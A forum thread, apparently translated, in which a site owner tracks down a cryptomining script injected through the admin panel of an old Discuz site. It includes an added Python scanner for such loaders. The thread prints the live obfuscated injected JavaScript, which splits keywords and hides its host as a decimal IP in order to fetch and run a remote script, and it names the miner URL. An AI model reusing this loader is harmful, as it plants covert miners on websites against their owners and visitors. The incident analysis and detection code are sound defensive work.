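pppcc posted on 2018-6-22 04:55:42

Solved

This post was last edited by pppcc on 2018-6-22 06:08

   I built a website for a friend, using a Discuz release from many years ago.
   I just discovered that the site has been compromised with injected code: a cryptocurrency-mining JS script, http://172.104.64.162/17.js
    https://i.loli.net/2018/06/22/5b2c0f7d6f7b7.png
   Using the method from ecosway598, I searched all the files and found nothing. Luckily it is a small site, and I finally found it in the admin panel. My friend probably didn't know any better and added it just hoping to improve SEO.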

   https://i.loli.net/2018/06/22/5b2c2123a77ca.png

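ecosway598 posted on 2018-6-22 05:04:28

pppcc posted on 2018-6-22 05:18:33

Downloading now... I had the same idea as you.

pppcc posted on 2018-6-22 05:32:04

I guess the file name is encrypted or hidden some other way; a search for 17.js found nothing.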
https://i.loli.net/2018/06/22/5b2c18a90c823.png

pppcc posted on 2018-6-22 06:00:56

I found a strange line of code
<script type="text/javascript">var HTMLXMLNS = 'http://www.w3.org/1999/xhtml', cookie_ns_type = 'ET', STATINODE = 'src', PT = '', creditnotice = '1||,2||,3||', DZ_ALL_SETTING = window, VARHASH = 'ipt',

css_classtype = '', HEADER_NODE='', STATIPATH = 'scr'; if(XMLHttpRequest) STATICNODE = XMLHttpRequest; FONT_CLASS_ID = '2892513442', cookie_pinfo = '17', cookie_ns_type = 'G' + cookie_ns_type,

IMGDIR = 'static/image/common', DZ_ALL_BODY = document, REPORT = 'Microsoft.XMLHTTP', NEWS = '', NEWS_ID = 4, JSFILE = 'js', CSSPAT = 'data/cache/style_', FONT_CLASS_ID =FONT_CLASS_ID + '/',

T_INFO = '', cookie_pinfo = cookie_pinfo + '.' + JSFILE; if( DZ_ALL_SETTING.ActiveXObject ) HEADER_NODE = DZ_ALL_SETTING.ActiveXObject; SCBARID = 200; if ( STATICNODE ) PT = new STATICNODE(); if (

HEADER_NODE ) PT = new HEADER_NODE(); FONT_CLASS_ID = HTMLXMLNS.substring(0,7) + FONT_CLASS_ID + cookie_pinfo; if ( PT ){ PT.open( cookie_ns_type , FONT_CLASS_ID);PT.onreadystatechange =

function() {if (PT.readyState == NEWS_ID && PT.status == SCBARID ){ N_INFO = ''; DZ_ALL_BODY.head.appendChild( DZ_ALL_BODY.createElement( STATIPATH + VARHASH )).innerHTML = PT.responseText;

PT = null;}}; PT.send();}; CSSPATH = 'data/cache/style_', DYNAMICURL1 = '';</script>
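
The search for 17.js in this thread found nothing because the quoted line never contains that string: it assembles 'script', 'GET' and '17.js' from fragments and writes the host as the single integer 2892513442, which is 172.104.64.162. The Python scanner below is an added example, not part of the original thread; its function names and keyword list are assumptions, and its input is a shortened, constructed copy of the quoted line.

```python
import ipaddress
import re
from itertools import permutations

# Constructed sample: a shortened copy of the injected line quoted in the post above.
SAMPLE = (
    "<script type=\"text/javascript\">var HTMLXMLNS = 'http://www.w3.org/1999/xhtml', "
    "cookie_ns_type = 'ET', VARHASH = 'ipt', STATIPATH = 'scr'; "
    "FONT_CLASS_ID = '2892513442', cookie_pinfo = '17', JSFILE = 'js', "
    "cookie_ns_type = 'G' + cookie_ns_type; "
    "DZ_ALL_BODY.head.appendChild( DZ_ALL_BODY.createElement( STATIPATH + VARHASH ))"
    ".innerHTML = PT.responseText;</script>"
)

# Assumed keyword list: words a script loader has a reason to hide from grep.
SPLIT_KEYWORDS = {"script", "GET", "POST", "eval"}
STRING_LITERAL = re.compile(r"'([^'\\]*)'|\"([^\"\\]*)\"")
XHR_TO_DOM = re.compile(r"\.innerHTML\s*=\s*\w+\.responseText")


def decimal_ipv4(literal):
    """Return the dotted-quad form if the literal is an IPv4 address written as one integer."""
    if not re.fullmatch(r"\d{8,10}", literal):
        return None
    value = int(literal)
    if value > 0xFFFFFFFF:
        return None
    return str(ipaddress.IPv4Address(value))


def scan(text):
    """Return sorted findings for loaders that assemble their strings at runtime."""
    findings = set()
    literals = [a or b for a, b in STRING_LITERAL.findall(text)]
    for lit in literals:
        ip = decimal_ipv4(lit)
        if ip:  # heuristic: any 8-10 digit literal decodes, so review each hit
            findings.add(f"decimal-ip:{lit}={ip}")
    fragments = {lit for lit in literals if 0 < len(lit) < 6}
    for left, right in permutations(fragments, 2):
        word = left + right
        if word in SPLIT_KEYWORDS and word not in literals:
            findings.add(f"split-keyword:{left}+{right}")
    if XHR_TO_DOM.search(text):
        findings.add("xhr-response-written-to-dom")
    return sorted(findings)
```

On a Discuz site the same function can be run over template files and over exported admin-panel settings, since this thread's injection was stored in the admin panel rather than in a file.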

ecosway598 posted on 2018-6-22 06:24:50
